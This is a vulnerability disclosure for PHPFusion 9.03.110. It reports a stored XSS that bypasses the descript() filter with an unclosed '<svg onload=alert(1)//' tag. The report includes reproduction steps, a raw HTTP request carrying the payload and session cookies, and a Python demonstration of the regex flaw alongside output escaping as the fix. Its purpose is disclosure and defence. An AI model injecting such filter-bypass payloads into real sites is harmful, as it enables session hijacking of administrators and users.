#KietNA From Inv1cta Team, HPT Cyber Security Center
Sorry for bad English
Describe the bug
The preg patterns in the descript() function filter HTML tags without "//"; an authenticated user can trigger XSS by appending "//" to the end of the text.
Version
PHPFusion version: PHPFusion 9.03.110
To Reproduce
Steps to reproduce the behavior:
Go to any textarea form
Add "<svg onload=alert(1)//" to the textarea form and submit
When an authenticated user or admin uses the preview HTML function, the malicious script will be executed; the attacker can even store the malicious script when the admin publishes the submission.
Screenshots
The preg pattern filters HTML tags without "//" at the end of the HTML
User previews and submits the submission
Admin previews the user's submission
Admin publishes the submission and the attacker can store the malicious script
The attacker can store the malicious script in the forum without the admin browsing the post, via the post new thread function
When the admin clicks on the Activity button, the script of user kietna will be executed
Additional context
###REQUEST:
POST /submit.php?stype=a HTTP/1.1
Host: 172.16.0.12:5554
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 395
Origin: http://172.16.0.12:5554
Connection: close
Referer: http://172.16.0.12:5554/submit.php?stype=a
Cookie: PHPSESSID=qhclrgdoah7rbv9l34fvj07h00; fusiony1dli_session=jjfp12qmql4s64caf8ob6eld2t; fusiony1dli_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0; fusiony1dli_user=1.1630015266.b9cf1c8d19231964f87b60503eb37b6cd23047438f61fe3b750f0d371a242ec6; fusiony1dli_admin=1.1630015307.2c32968c83f8c4c0224d5a0d4a0de496d62b98325c2754a38c3451087161671e; fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; fusionc4q8w_visited=yes; fusionc4q8w_lastvisit=1629852584; fusionc4q8w_user=2.1630031855.2d2e26d63d89a73447202a9978b3ff81a084dae1acbddeeb4c6fd5de86f85469
Upgrade-Insecure-Requests: 1
fusion_token=2-1629861818-8b90d545094236c6cc3daa34012b16531afc70a7d12df00e8dba976f92f37e84&form_id=submissionform&fusion_wKs75X=&article_subject=%22%3E%3Csvg+onload%3Dalert%281%29%3B%2F%2F&article_keywords=&article_cat=1&article_language%5B%5D=English&article_snippet=%22%3E%3Csvg+onload%3Dalert%281%29%3B%2F%2F&article_article=%22%3E%3Csvg+onload%3Dalert%281%29%3B%2F%2F&preview_article=Preview
###RESPONSE:
HTTP/1.1 200 OK
Date: Wed, 25 Aug 2021 03:25:24 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
X-Powered-By: PHPFusion 9.03.110
Last-Modified: Wed, 25 Aug 2021 03:25:25 GMT
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68868
KietNA-HPT changed the title from "Cross-site Scripting bypass in descript() function" to "Bypass preg pattern lead to Cross-site Scripting in descript() function" on Aug 25, 2021
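The failure mode the report describes is a tag-stripping regex that only matches an element once its closing ">" is present, so a payload that never closes the tag passes through and the next ">" on the page closes it in the browser. The Python below is an added illustration written for this page, not PHPFusion's descript() code: the DANGEROUS_TAG pattern, the strip-until-stable loop and the preview renderers are assumptions built to reproduce that property, and the two payloads are constructed. It shows the closed payload being removed, the "//" payload from the report surviving, and the hardened alternative of escaping on output.

```python
import html
import re

# Constructed stand-in for a tag-stripping filter. It is NOT PHPFusion's
# descript(); it only reproduces the property the report describes: the
# pattern matches from '<' up to a closing '>', so input with no '>' after
# the '<' is never matched.
DANGEROUS_TAG = re.compile(
    r"<[^>]*(?:\bon\w+\s*=|script|svg|iframe)[^>]*>",
    re.IGNORECASE,
)


def strip_dangerous_tags(text: str) -> str:
    """Apply the pattern repeatedly until the text stops changing."""
    while True:
        cleaned = DANGEROUS_TAG.sub("", text)
        if cleaned == text:
            return cleaned
        text = cleaned


def render_preview_unsafe(user_text: str) -> str:
    """Preview page that trusts the filter and embeds its output raw.

    The markup that follows the user text supplies the '>' that closes an
    unclosed <svg ...> tag, which is why the browser still fires onload.
    """
    return '<div class="preview">' + strip_dangerous_tags(user_text) + "</div>"


def render_preview_safe(user_text: str) -> str:
    """Hardened form: escape on output so '<' can never open a tag.

    In PHP this is htmlspecialchars($text, ENT_QUOTES); html.escape is the
    Python equivalent.
    """
    return '<div class="preview">' + html.escape(user_text, quote=True) + "</div>"


def live_event_handler(rendered: str) -> bool:
    """True if an unescaped '<tag ... on*=' survives in the rendered page."""
    return re.search(r"<\w+[^>]*\bon\w+\s*=", rendered, re.IGNORECASE) is not None


# Constructed payloads: the closed form is what the filter expects; the
# second is the '//' form from the report, with no closing '>'.
CLOSED_PAYLOAD = '"><svg onload=alert(1)>'
UNCLOSED_PAYLOAD = '"><svg onload=alert(1)//'


if __name__ == "__main__":
    for payload in (CLOSED_PAYLOAD, UNCLOSED_PAYLOAD):
        page = render_preview_unsafe(payload)
        print(repr(payload), "->", repr(strip_dangerous_tags(payload)),
              "| handler reaches browser:", live_event_handler(page))
    print("escaped preview:", render_preview_safe(UNCLOSED_PAYLOAD))
```

The point the second payload makes is that a deny-list regex sees only the submitted fragment, while the browser tokenizes the whole page; any filter keyed on the closing bracket can be skipped by leaving it out. Escaping at the output boundary removes the dependency on the filter recognising every tag shape.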